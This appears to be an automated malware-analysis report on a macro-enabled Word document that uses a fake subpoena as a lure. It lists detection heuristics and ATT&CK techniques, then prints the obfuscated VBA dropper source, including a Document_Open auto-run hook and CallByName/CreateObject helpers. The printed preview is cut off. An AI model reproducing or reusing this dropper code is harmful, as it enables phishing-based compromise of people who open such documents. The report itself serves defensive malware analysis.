MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, a common technique for executing code automatically when the document is opened. The macro source is obfuscated but still calls CreateObject and CallByName, which indicates it likely attempts to download and execute a second-stage payload. The document body displays a purported subpoena as a lure to persuade the user to enable macros.
Heuristics 8
- ClamAV: Doc.Dropper.Agent-1399074 (critical) [CLAMAV_DETECTION] — ClamAV detected this file as malware: Doc.Dropper.Agent-1399074
- VBA macros detected (medium; 5 related findings) [OLE_VBA_MACROS] — Document contains VBA macro code
- Document_Open macro (high) [OLE_VBA_DOCOPEN] — Document contains a Document_Open auto-execution macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ] — Macro code calls CreateObject
- GetObject call (high) [OLE_VBA_GETOBJ] — Macro code calls GetObject
- CallByName call (high) [OLE_VBA_CALLBYNAME] — Macro code calls CallByName
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC] — The compiled VBA (p-code) / cache stream contains an auto-execution token together with shell, download, or object-execution tokens. This heuristic catches p-code-only documents and documents whose macro source could not be extracted, where no readable source is available.
- Embedded URL (info) [EMBEDDED_URL] — One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body). This is the standard DrawingML XML namespace identifier; it was found in the document text, not in macro code.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14360 bytes |

SHA-256: fc615b8cb3a9096e06fb4d59a9c6e4e58d6b1cd102ef1a0abe19230fab3cdfc6
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
TlZjc2De8.QQeu4iQ9ZhW
End Sub
Public Sub yj5zhKqBmrCl9PP()
Dim c3wXPiAOmzJYx As Object
Dim EVZTdzs As Integer
Dim DMkguWXTWAJm7sH As Variant
Dim oajqhL As Variant
On Error GoTo FPSPmRELh0f
Set c3wXPiAOmzJYx = evslot.yPZ74txZOio(nclOESQBrSf(mLug7isEYOXiC.gyClXPESEhF, 48), U2GPMn00xXx.SKW2fm)
EVZTdzs = VriImfWA1KN(c3wXPiAOmzJYx, nclOESQBrSf(mLug7isEYOXiC.uzNQPlLRAj, 114))
If EVZTdzs <> hBOZusH.GX4JInHqlx3rYNy Then
Err.Raise Number:=1
End If
DMkguWXTWAJm7sH = VriImfWA1KN(c3wXPiAOmzJYx, nclOESQBrSf(mLug7isEYOXiC.zsuVrFdyiyBmqa, 340))
oajqhL = U2GPMn00xXx.kG3kv8x & hBOZusH.qXC4lks3p & U2GPMn00xXx.cJuUNRrq8exCZ
wtmQYPJ oajqhL, DMkguWXTWAJm7sH
hsdrPqpzSAt oajqhL
Exit Sub
FPSPmRELh0f:
End Sub
Attribute VB_Name = "mLug7isEYOXiC"
Attribute VB_Base = "0{64E31D02-CDB4-4F26-8405-68C97F3169F6}{A702B371-FEAA-44A3-B829-DEDEBA91BDC8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "evslot"
Private Const vOTRpfGyCjYaAXtBKr As String = "rEqe5nNAVJbstLc9o"
Public Function yPZ74txZOio(ByVal ksBf8QOMgTj As Variant, ByVal EynrZa36t As Variant) As Variant
Set yPZ74txZOio = ZvpNmOJjZe.xKBUnEo2fp(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.GRZAWXBhbl, 873))
TlZjc2De8.bBFHwI0Tji yPZ74txZOio, TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.tAannniEZ, 65), ksBf8QOMgTj, EynrZa36t, False
TlZjc2De8.n3l2A8olHz8c yPZ74txZOio, TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.oPalzXQSuK, 68)
End Function
Public Function lkHsb4gDkL() As Integer
lkHsb4gDkL = 0
End Function
Public Function xIJO9if64KwwoxM() As Variant
xIJO9if64KwwoxM = U2GPMn00xXx.Kshb5HhPC9yf(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.mxPoTjbX, 116), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.mkZHhwcJa, 132), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.KVWdFbtc, 132), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.iGtMYvsOYp, 108), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.GyELCwmBxXz, 164), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.EPqDUnY, 185))
End Function
Private Function SPKhXgyYpkGt() As Integer
SPKhXgyYpkGt = 1442
End Function
Public Function xdCXs90ZjRT1QzF() As Integer
xdCXs90ZjRT1QzF = 3170 / TlZjc2De8.fFS4YCN
End Function
Public Function rHAZXbgS5Ka() As Variant
rHAZXbgS5Ka = TlZjc2De8.WsJ9yFZs(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.qPLWKDTnuKCoPT, 147))
End Function
Public Function A4VmYVPINyAof() As Integer
A4VmYVPINyAof = 2
End Function
Public Function CEtfkJI1() As Boolean
If U2GPMn00xXx.lEiihgAN54Gs0mL Or U2GPMn00xXx.CWDoi639bQ Then
CEtfkJI1 = U2GPMn00xXx.ruGHXG
Else
CEtfkJI1 = True
End If
End Function
Attribute VB_Name = "U2GPMn00xXx"
Public Function LwtDwU4K(ByVal dNScBRLkoFP As Object, ByVal Vl1NpbO6FtY As String, ByVal drLRiTo4jZw1p As Variant) As Variant
Set LwtDwU4K = CallByName(dNScBRLkoFP, Vl1NpbO6FtY, 1, drLRiTo4jZw1p)
End Function
Public Function VriImfWA1KN(ByVal dNScBRLkoFP As Object, ByVal cuLxHH62OJu7 As String) As Variant
VriImfWA1KN = CallByName(dNScBRLkoFP, cuLxHH62OJu7, 2)
End Function
Public Function kG3kv8x() As Variant
kG3kv8x = TlZjc2De8.WsJ9yFZs(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.BzZfUYoGyS, 75))
End Function
Private Sub lWQz0T7mr(ByVal dNScBRLkoFP As Variant, ByVal Vl1NpbO6FtY As Variant, ByVal P4FL9kETbRJ As Variant, ByVal FsRcQJ8vgmMYOq As Variant)
CallByName dNScBRLkoFP, Vl1NpbO6FtY, 1, P4FL9kETbRJ, FsRcQJ8vgmMYOq
End Sub
Private Function pnkBfasJXi() As Variant
pnkBfasJXi = VriImfWA1KN(ThisDocument, TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.jBDagKNjX, 75))
End Function
Public Function Kshb5HhPC9yf(ParamArray VxplD2mN33P() As Variant) As Variant
Kshb5HhPC9yf = VxplD2mN33P
End Function
Public Function cJuUNRrq8exCZ() As String
cJuUNRrq8exCZ = TlZjc2De8.EQyqPA(Rnd)
End Fun
... (truncated)